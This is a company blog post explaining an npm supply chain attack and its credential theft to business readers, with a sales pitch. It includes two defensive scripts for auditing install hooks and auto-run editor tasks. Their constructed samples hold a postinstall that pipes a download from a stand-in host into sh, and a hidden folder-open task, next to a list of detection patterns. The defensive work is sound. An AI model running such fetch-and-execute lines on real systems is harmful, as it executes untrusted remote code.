TechOrigins
AI Development

89 Code Packages Got Hacked. Here Is What It Means for Your Business.

Hackers hid bad code in 89 npm packages downloaded 700,000+ times a month. Deleting the package does not remove it. What the npm supply chain attack means for your business in plain words.

June 15, 2026 · 6 min read

(Image: supply chain attack diagram)

TL;DR

  • Hackers hid bad code in 89 free code packages. People download them more than 700,000 times a month.
  • The bad code hides in your editor. You can delete the package, but the code still runs.
  • It steals your keys and passwords - cloud logins, GitHub tokens, SSH keys, all of it.
  • It all started with one stolen password from one worker.
  • A careful, senior team is your best defense. That is what we do at TechOrigins.

Most apps today are built from parts. Your team does not write every line of code. They pull in free packages made by other people. This saves time. Most days, it works great. But last week, it went wrong again.

Let me walk you through it in plain words.

What happened

Hackers got into 89 code packages. They hid bad code inside them. When your team installs a package, the bad code runs on their computer.

This is called a supply chain attack. It means the threat comes from a part you trust. It does not come from your own code. That is what makes it so hard to catch.

The bad code came in two waves. The first wave hit 32 packages. The second wave hit 57 more. Some bad versions are still live right now.

Why deleting the package does not fix it

Here is the scary part. The bad code does not stay in the package.

When it runs, it copies itself into your editor's settings and adds a small start-up hook that fires on its own. So every time your coder opens their editor, the bad code runs again, whether or not the package is still installed.

This means your team can delete the package. They can wipe the folder. They can install a fresh, clean copy. And the bad code still runs. Removing the package removes nothing. You have to clean the editor too.

It steals your keys and passwords

(Image: cybersecurity breach)

While the bad code runs, it grabs your secrets. It takes your cloud logins. It takes your GitHub tokens. It takes your SSH keys. It grabs all of them and sends them out.

It is also smart. It checks if you run security tools first. If you do, it stays quiet. That way it can hide on watched machines.

It even sets a trap. It pings a server every minute. If you revoke a stolen key too fast, before the malware is cut off and removed, the trap goes off and wipes your whole home folder. Your files are gone for good. The normal advice, "change all your keys right now", is the exact thing that sets off the trap. The hackers built it that way on purpose.

How one stolen password started it all

(Diagram: stolen GitHub password → repo access → malicious code pushed → build system packages it → bad packages shipped)

The whole mess began with one login.

The hackers had one worker's GitHub password. They likely stole it weeks earlier with other malware, an info-stealer that grabs saved passwords from web browsers.

With that one login, they pushed bad code straight into three of the company's code repositories. No one reviewed it. Then the company's own build system ran and shipped the bad packages out.

Because the company's system built them, the packages looked safe. They were signed. Every safety check passed. Why? Because the code really did come from the company. The trust was real. A signature proves who built a package, not that what they built is safe. That is what makes this attack so clever and so scary.

Why this is a business problem, not just a tech one

It is easy to think this is only a coder's problem. It is not. It hits the whole business.

Think about the money. Stolen cloud keys can run up huge bills. They can also let hackers steal your data and your customers' data.

Think about trust. If your app leaks user data, people leave. Trust is hard to win and easy to lose.

Think about the law. Many rules now say you must guard user data. A leak can mean big fines.

And the scale here is huge. The group behind this is called TeamPCP. They have hit 487 companies. They have stolen almost 300,000 secrets. They now work with a ransomware gang. So your stolen keys may become a way in for an even bigger attack. They have hit big names too - GitHub, Mistral AI, OpenAI, and the European Commission. They even shared their tool with the world and offered a cash prize for the best new uses. So this will not stop soon. Copycats are already at work.

What a careful team does about it

This is where the team you hire really matters. Good habits stop most of these attacks before they start. Here is what we do at TechOrigins.

  • We lock down every login with a second sign-in step, so one stolen password is not enough.
  • We check new packages before we use them, including what they run at install time. We do not just trust a name.
  • We watch what code does, not just what it claims to be, because new threats get caught by their actions.
  • We keep your keys out of the code.
  • We change keys in a safe order, so no trap goes off: cut the machine off first, remove the hooks, then rotate.
  • We build with you and stay for support. We do not vanish at launch.
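Here is what "check new packages before we use them" can look like in practice. This is an added example, not TechOrigins' code and not from any of the sources listed below. npm runs a package's `preinstall`, `install`, `postinstall` and `prepare` scripts on its own when the package is installed, which is how a package can run code on a developer's machine the moment it is added. The script below reads a package.json, lists every such hook, and flags commands that fetch remote code, decode a hidden payload, or pipe text into an interpreter. The package name and commands in the sample are constructed for illustration.

```javascript
// Added example: audit an npm package.json for install-time lifecycle scripts.
// Not TechOrigins' code; the sample package at the bottom is constructed.

// Scripts npm runs automatically during install (plus the publish-side prepare hooks).
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepublish', 'preprepare', 'prepare', 'postprepare'];

// Patterns that are rarely legitimate in an install script. These are heuristics,
// not a definition of "malicious": a hit means "a human must read this first".
const RISKY_PATTERNS = [
  { name: 'remote download', re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i },
  { name: 'inline node eval', re: /\bnode\s+(-e|--eval)\b/ },
  { name: 'base64 decode', re: /base64|atob\(/i },
  { name: 'eval / Function()', re: /\beval\(|new Function\(/ },
  { name: 'pipe into interpreter', re: /\|\s*(sh|bash|node|python)\b/ },
];

// Returns every lifecycle hook the package declares, which patterns each one hits,
// and a verdict: 'ok' (no hooks), 'review' (hooks, nothing flagged), 'block' (flagged).
function auditLifecycleScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    const command = String(scripts[hook]);
    const reasons = RISKY_PATTERNS.filter((p) => p.re.test(command)).map((p) => p.name);
    findings.push({ hook, command, risky: reasons.length > 0, reasons });
  }
  let verdict = 'ok';
  if (findings.length > 0) verdict = findings.some((f) => f.risky) ? 'block' : 'review';
  return { name: pkg.name, version: pkg.version, findings, verdict };
}

// Constructed sample: a package whose postinstall pulls a script from the network and runs it.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'example-widget',
  version: '1.2.3',
  scripts: {
    build: 'tsc -p .',
    postinstall: 'node -e "require(\'child_process\').execSync(\'curl -s https://example.invalid/x | sh\')"',
  },
});

console.log(JSON.stringify(auditLifecycleScripts(SAMPLE_PACKAGE_JSON), null, 2));
```

Run this against the package.json inside the tarball you are about to install (`npm pack <name>` fetches it without running anything), not against the copy on the registry's web page. A cheaper, broader guard is to set `ignore-scripts=true` in the project's `.npmrc`, so no install script runs at all, and to allow-list the few packages that genuinely need one.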

We have shipped 75+ products in 10 years. Senior team only. No juniors. No handoffs. The people who plan your project are the people who build it. That is how you keep your software safe.

What to do if you think you were hit

Order matters here. Do not change your keys first. That can set off the trap. Do this instead.

  1. Cut the machine off the internet.
  2. Remove the bad start-up hooks from your editor settings.
  3. Only then change your keys and passwords.
  4. Check your build system for any strange new machines linked to it.
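Step 2, and the "Why deleting the package does not fix it" section above, both come down to one question: which parts of the editor's settings run code on their own when a project is opened? As an added example (not TechOrigins' code, and not taken from any of the sources below), the script below answers it for one concrete editor. The article does not name the editor, so VS Code is an assumption here: its `tasks.json` can mark a task with `"runOptions": {"runOn": "folderOpen"}`, which makes it run every time the folder is opened. The script lists those tasks and returns a cleaned copy of the file with them removed. The sample file, including its hidden task, is constructed.

```javascript
// Added example: find and strip auto-run tasks from a VS Code tasks.json.
// Assumption: the editor is VS Code; the article names none. Not TechOrigins' code.

// tasks.json is JSONC (comments and trailing commas allowed). Simplified stripper:
// removes /* */ blocks, whole-line // comments and trailing commas; it does not
// handle "//" inside string values.
function stripJsonComments(text) {
  return text
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/^\s*\/\/.*$/gm, '')
    .replace(/,\s*([}\]])/g, '$1');
}

function isAutoRun(task) {
  return Boolean(task && task.runOptions && task.runOptions.runOn === 'folderOpen');
}

// Returns one entry per task that runs on folder open, with the command it would execute.
function findAutoRunTasks(tasksJsonText) {
  const doc = JSON.parse(stripJsonComments(tasksJsonText));
  const tasks = Array.isArray(doc.tasks) ? doc.tasks : [];
  return tasks.filter(isAutoRun).map((t) => ({
    label: t.label || '(unnamed)',
    type: t.type || 'shell',
    command: [t.command, ...(t.args || [])].filter(Boolean).join(' '),
  }));
}

// Returns the document text with every auto-run task removed. Review the list from
// findAutoRunTasks first; the caller decides whether to write this back to disk.
function removeAutoRunTasks(tasksJsonText) {
  const doc = JSON.parse(stripJsonComments(tasksJsonText));
  const tasks = Array.isArray(doc.tasks) ? doc.tasks : [];
  doc.tasks = tasks.filter((t) => !isAutoRun(t));
  return JSON.stringify(doc, null, 2);
}

// Constructed sample: one real build task and one hidden task that runs on open.
const SAMPLE_TASKS_JSON = `{
  // See https://go.microsoft.com/fwlink/?LinkId=733558 for the documentation
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", "group": "build" },
    {
      "label": "",
      "type": "shell",
      "command": "node",
      "args": ["-e", "require('./node_modules/.cache/hidden.js')"],
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" },
    },
  ]
}`;

console.log(findAutoRunTasks(SAMPLE_TASKS_JSON));
```

The hidden task in the sample has an empty label and `"reveal": "never"`, so nothing shows in the editor when it runs; that is the kind of entry to look for. Check the workspace `.vscode/tasks.json`, the user-level settings, and the list of installed extensions, and compare each against what is committed in version control. Do this on the disconnected machine, before any key is rotated.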

If this feels like a lot, you do not have to do it alone. A senior team can help you check your apps and lock them down.

Worried about your own apps? Let's talk. We will give your software an honest look and tell you straight where the risks are.


Quick answers

What is a software supply chain attack?

It is when hackers hide bad code inside a trusted part your app depends on, like a free code package. The threat comes from a part you trust, not from your own code. The recent npm attack hid malware in 89 packages downloaded over 700,000 times a month.

Why does deleting the package not remove the malware?

Because the bad code copies itself into your editor's settings and adds a startup hook. It runs every time you open the editor. So deleting the package and reinstalling a clean copy is not enough. You must clean the editor settings too.

What should I do first if I think I was hit?

Do not change your keys first, that can trigger a trap. First, take the machine off the internet. Second, remove the bad hooks from your editor settings. Third, change your keys. Fourth, check your build system for strange new machines.

How can my business stay safe?

Use extra login steps, check new packages before using them, use tools that watch what code does, keep keys out of your code, and rotate keys in a safe order. A senior team that builds with care is your best defense.

Sources: Microsoft Threat Intelligence; StepSecurity; Snyk; Tenable; GitGuardian State of Secrets Sprawl 2026; Krebs on Security.

Tags: npm · npm packages · npm package compromised

The TechOrigins team — a senior-only studio that has shipped 75+ AI apps, SaaS products, and high-conversion Shopify stores.
